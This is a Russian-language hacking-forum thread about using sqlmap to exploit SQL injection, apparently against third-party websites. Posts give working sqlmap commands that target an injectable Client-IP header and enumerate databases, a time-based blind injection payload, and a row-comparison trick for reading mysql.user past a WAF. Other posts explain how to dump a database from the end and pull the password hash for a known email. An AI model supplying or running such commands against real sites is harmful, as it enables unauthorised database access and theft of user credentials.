Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. xmp

    xmp Member

    Joined:
    14 Dec 2018
    Messages:
    13
    Likes Received:
    9
    Reputations:
    4
    Вопрос: как при помощи sqlmap сделать из запроса SELECT password FROM a.user
    (Где password фильтруется WAF) запрос вида SELECT 0x70617373776F7264 FROM a.user
     
    #821 xmp, 25 Dec 2018
    Last edited: 25 Dec 2018
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    "SELECT 0x66 FROM a.user" так не получится, просто заселектиш строку

    смотря что за запрос, но это в любом случае отдельный скрипт писать придется
    если знаешь количество колонок в a.user то можно что то около того бинарным перебором сделать
    Code:
    mysql> select 'true' from(select 1)x where 'aocalhost'>'localhost';
    Empty set (0.00 sec)
    
    mysql> select 'true' from(select 1)x where 'qocalhost'>'localhost';
    +------+
    | true |
    +------+
    | true |
    +------+
    1 row in set (0.00 sec)
    
    на примере mysql.user, первая колонка в этой таблице "Host"

    Code:
    mysql> select 'true' from(select 1)x where ('aocalhost',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45) > (select * from mysql.user limit 1);
    Empty set (0.01 sec)
    
    mysql> select 'true' from(select 1)x where ('qocalhost',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45) > (select * from mysql.user limit 1);
    +------+
    | true |
    +------+
    | true |
    +------+
    1 row in set (0.01 sec)
    
     
    _________________________
    eminlayer7788 and xmp like this.
  3. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Как сливать базу с конца ?
     
  4. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    И ещё
    Знаю почту как чтобы всё не сливать вытащить хеш от этой почты ?
     
  5. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    --start --stop
     
    _________________________
  6. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    1)--sql-shell
    2)SELECT * FROM table_name WHERE email="[email protected]";
     
    _________________________
    panic.ker and Spinus like this.
  7. =HALK=

    =HALK= Member

    Joined:
    30 Oct 2008
    Messages:
    27
    Likes Received:
    27
    Reputations:
    40
    --where="email='mail@mail'"
     
  8. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток. Подскажите как правильно "скормить" ссылку в sqlmap.
    Сканер выдал такие данные:
    This vulnerability affects /blog/adaptive-learning/.
    Discovered by: Scripting (Blind_Sql_Injection.script).
    Attack details
    HTTP Header input Client-IP was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/

    И Header вот такой:

    GET /blog/adaptive-learning/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Client-IP: (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
    X-Requested-With: XMLHttpRequest
     
  9. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Code:
    -u https://site.ru/ --headers="Client-IP: *" --dbms=mysql --random-agent --level=3 --risk=3 --dbs
     
    none222 and vladF like this.
  10. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Ребят помогите, как правильно соединиться с сервером?
    Что должно быть в new xmpp.Router()
    /////////////////////////////////////////////////////////////
    var xmpp = require('node-xmpp')
    let s2s = new xmpp.Router()
    s2s.register('test.servers', function (stanza) {
    })

    ////////////////////////////////////////////////////////////
    Пишу Так
    -------------------------------------------
    var xmpp = require(
    'node-xmpp')
    let s2s = new xmpp.Router({
    host: 'localhost',
    port: 5269,
    })

    s2s.register('test.servers', function (stanza) {
    })

    -------------------------------------------
    Выдает
    ------------------------------------------------------------------------

    Unhandled rejection TypeError: xmpp.Router is not a constructor
    ------------------------------------------------------------------------
    В чем проблема???
     
    #830 nik1201, 21 Jan 2019
    Last edited: 21 Jan 2019
  11. Zabiyaka1

    Zabiyaka1 New Member

    Joined:
    21 Jan 2019
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Всем привет. Скажите как через SQLmap напрямую подключиться к БД Oracle.Пакеты необходимые установила... Но вожу команду подключения вида:
    -d oracle://***Password@IP: PORT/dbname/
    Но SQlmap выдает

    [INFO] testing Oracle
    [INFO] confirming Oracle
    [INFO] the back-end DBMS is Oracle
    back-end DBMS: Oracle


    Если добавит --dbms то выдает, следующее

    [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
    [INFO] fetching current database
    [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
    [[WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
    INFO] fetching database (schema) names
    [INFO] falling back to current database
    [INFO] fetching current database
    [CRITICAL] unable to retrieve the database names


    Что не делаю не так, и возможно ли вообще подключиться в данном случае??
     
    #831 Zabiyaka1, 22 Jan 2019
    Last edited: 22 Jan 2019
  12. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    -d oraclel://test:[email protected]:3306/имябазы
    [CRITICAL] unable to retrieve the database names
    не может получить имя базы данных
    Пробуй --no-cast или --hex
    Другими словами мапа не может понять к чему ей подключатся.
    То есть тебе надо узнать имя бд для начала
     
    #832 karkajoi, 23 Jan 2019
    Last edited: 23 Jan 2019
    Zabiyaka1 and Sensoft like this.
  13. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Доброй ночи
    Несколько вопросов:
    1. Выводит колонку password как none, извлекает именно слово none посимвольно, в каждой строке. Как такое может быть? Можно ли что-то сделать?
    2. Бывает извлекает пасы как <blank> или еще что-нибудь подобное, hex и nocast не помогает, это какая-то защита стоит я так понимаю, только тамперы подбирать?
    3. Глупый вопрос, как определить текущую базу данных. Раскручиваешь скулю, там куча баз данных, бывает допустим sitename, sitenamedb, test_sitename и прочие в куче. Как определить текущую/рабочую? думал это curent-db, но с этой командой он просто извлекает таблицы всех баз подряд.

    Спасибо за помощь
     
  14. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    есть очень годный совет, правда большинство будет кидать камнями когда его услышит. если скуль ставит палки в колеса - бросай велик и крути скуль пешком :)
     
    _________________________
  15. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    вынужден не согласится :) мой совет не подойдет только при описании конкретного инъекта с определенными проблемами. в данном случае(и похожих) он вполне подходит
     
    _________________________
  16. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    уу много букв, не осилил :(
     
    _________________________
  17. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    так и смысл тогда :)? я смотрю вы неплохо словоблудите, это ваша стихия :D
     
    _________________________
  18. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    У меня много талантов
     
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    охотно верю
    Code:
    1. Выводит колонку password как none, извлекает именно слово none посимвольно, в каждой строке. Как такое может быть? Можно ли что-то сделать?
    2. Бывает извлекает пасы как <blank> или еще что-нибудь подобное, hex и nocast не помогает, это какая-то защита стоит я так понимаю, только тамперы подбирать?
    3. Глупый вопрос, как определить текущую базу данных. Раскручиваешь скулю, там куча баз данных, бывает допустим sitename, sitenamedb, test_sitename и прочие в куче. Как определить текущую/рабочую? думал это curent-db, но с этой командой он просто извлекает таблицы всех баз подряд.
    
    это, извиняюсь, ерунда
    1. - то что выводит sqlmap сугубо его дела, признаюсь лезть в многокиловый питоновский код, чтобы ответить на ваш вопрос, у меня желания нет
    2. - может быть что угодно, да может быть и waf "какая-то защита стоит я так понимаю". опять же, только ручной анализ поможет определить проблему и решение(если таковое существует)
    3. - вот этот вопрос собвственно и сподвиг меня облачить шпагу. как можно не знать как узнать текущую БД :mad:

    ваш нужно сейчас, просто и быстро нужна информация. хм, возможно тут найдутся люди которые помогут, сорь что потратил ваше время :)
     
    _________________________
  20. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    благодарствую
     
    t0ma5 likes this.